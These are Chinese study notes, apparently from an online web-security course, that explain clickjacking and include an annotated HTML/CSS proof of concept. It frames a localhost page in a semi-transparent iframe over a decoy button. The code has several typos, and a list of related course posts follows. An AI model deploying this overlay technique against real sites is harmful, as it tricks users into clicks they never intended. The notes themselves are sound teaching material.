网易云课堂web安全学习第七天——了解点击劫持
第一
什么是点击劫持
通过覆盖不可见的框架误导受害者点击而造成的攻击行为
特点:隐蔽性高 骗取用户操作 UI-覆盖攻击
利用iframe或者其他标签的属性
第二
他是如何实现的
<html>
<meta http_equiv="Content-Type" content="text/html; charset=utf-8" />
<head>
<title>网易云课堂</title>
<style>html,body,iframe{display: block; //display属性是设置元素的显示方式 block是以区块的方式height: 100%;width: 100%;margin: 0;padding: 0; //margin和padding的意思是元素间距为零border: none; //border是边框,意思是去除边框}
</style>
</head><body><iframe src="http://127.0.0.1/index.html"></iframe></body>
</html>/*以上代码的意思是将url里的界面,完整的显示在浏览器中*/
完整实现代码
<html>
<meta http_equiv="Content-Type" content="text/html; charset=gb2312" />
<head>
<title>点击劫持</title>
<style>html,body,iframe{display: block; //display属性是设置元素的显示方式 block是以区块的方式height: 100%;width: 100%;margin: 0;padding: 0; //margin和padding的意思是元素间距为零border: none; //border是边框,意思是去除边框}iframe{filter:alpna(opacity=30); /* IE */-moz-opacity:0.3; /* Moz+PP */opacity:0.3; /* 支持css3的浏览器(PP1.5也支持)*/position:absolute;z-index:2;}/*以上代码都是设置iframe里面的可见度,因为浏览器的原因,用多种方式设置可见度*/button{position:absolutetop: -5px; //元素与浏览器上边界的距离left: 875px; //元素与浏览器左边距的距离z-index: 1; //设置内容离我们的视觉效果的远近,越大越接近width: 72px;height: 26px;}/*以上的代码就是调整buttton里内容的位置,使他的点击位置和我们想在的页面点击位置一致*/</style>
</head><body><buttton><img src="data:images/click.png"></button> //用来吸引用户点击的内容/*button标签定义一个按钮,在<button>元素内部你可以放置内容*/<iframe src="http://127.0.0.1/index.html"></iframe>/*用户真正点的东西,但是我们已经将他设置为不可见*/</body>
</html>
网易云课堂web安全学习第七天——了解点击劫持相关推荐
- 网易云课堂web安全学习第七天——了解url跳转漏洞
第一 url跳转漏洞是什么 借助未验证的URL跳转,将应用程序引导到不安全的第三方区域,从而导致安全问题 比如:http://www.baidu.com?url=www.longaotian.cn 第 ...
- 2018最新网易云课堂 web白帽子培训教程 价值2000元
课程介绍: 网易白帽子教程就是网易云课堂微专业白帽子黑ke训练营教程,来自以品质著称的网易云课堂的<Web安全工程师微专业>,由7位网易安全大牛与多位云课堂教育专家匠心打造,是一套从入门到 ...
- 网易云课堂Java进阶学习笔记系列01 -- 第3周 对象容器
个人为了复习一下Java基础, 在网易云课堂上报了翁恺老师的Java语言程序设计进阶篇的课程, 主要看了其中的3. 对象容器, 6. 设计原则, 7. 抽象与接口, 8. 控制反转与MVC模式这几部分 ...
- 网易云课堂[Web安全工程师]第一部分 第二章WEB简介 学习记录
[仍旧写在前面 个人学习笔记] 第一部分 WEB基础知识 第二章 WEB基础知识 第一节 前端开发基础--HTML课后小测验 1 HTML页面的注释符号是那种?<!-- --> 2 若要在 ...
- 网易云课堂Web安全工程师课程分享——第二章 Web开发基础知识
第一节 前端开发基础--HTML 课程回顾 Web页面通常使用哪几种语言开发? HTML结构包含哪两部分? HTML元素由哪几部分组成? 常见的HTML标签有哪些? HTML DOM是什么结构? 总结 ...
- 网易云课堂Web安全工程师课程分享——第一章 Web介绍
第一节 Web介绍 课程回顾: Web是什么? Web发展分为哪几个阶段? Web安全问题发展形势? Web的工作流程? 浏览器是如何工作的? 总结回答: Web指的是World Wide Web,平 ...
- 网易云课堂web安全第一天
1.URL是什么,有什么作用? 答:URL是浏览器访问服务器的一段路径,用来指定该往何处访问. 2.描述一下URL的格式? 答:协议+host地址或者域名+端口(默认80或者8080自动跳转)+Pat ...
- 网易云课堂Java进阶学习笔记系列03 -- 第7周 抽象与接口
第七周 抽象与接口 在第一周就有一个Shape类的例子.这个类有很多的子类,每个子类也都实现了父类的方法.实际上父类Shape只是一个抽象的概念而并没有实际的意义. 举例案例理解 如果请你画一个圆,你 ...
- 网易云课堂--软件工程学习心得
网易云课堂–软件工程学习心得 一.软件工程实验 通过十周的学习,老师要求的网易云课堂–软件工程的学习,终于结束了. 从开始的对linux平台的不熟悉,到能够熟练运用linux书写代码,我相信大家和我一 ...
最新文章
- 火狐推荐几个实用的插件
- 怎样打开win7和vista系统的telnet服务
- 5G NGC — 关键技术 — 网络切片 — 切片的选择
- 了解如何解决OSGI捆绑包
- 浪潮服务器建立虚拟驱动器,像《十二时辰》一样去建立标准! 浪潮这款服务器做到了...
- js中for循环调用回调函数,一直循环最后一个
- 「装X指南」:手把手教你包装成程序员大佬
- mysql超大sql怎么还原_关于Mysql 大型SQL文件快速恢复方案
- 计算机毕业设计中用js+html+java文件下载(一)
- ChainIDE 3. 使用truffle部署合约
- Objective C类方法load和initialize的区别
- Cross-compiling Apache httpd 2.2.19 for uclibc
- 数据结构:线性表的顺序存储结构,实现集合的交差并补
- 软件工程导论04-设计工程
- RS485通信的学习以及思考
- kubekey搭建K8s集群与kubeSphere容器云管理平台实战
- 计算机网络安全技术文献综述,计算机网络安全防护技术研究总结与参考文献
- nginx变量传递给php,php-从nginx将参数传递给auth_request模块
- 学校信息计算机教案百度文库,人教版信息技术教案 八年级下册_百度文库(45页)-原创力文档...
- 微信小程序(心理咨询类)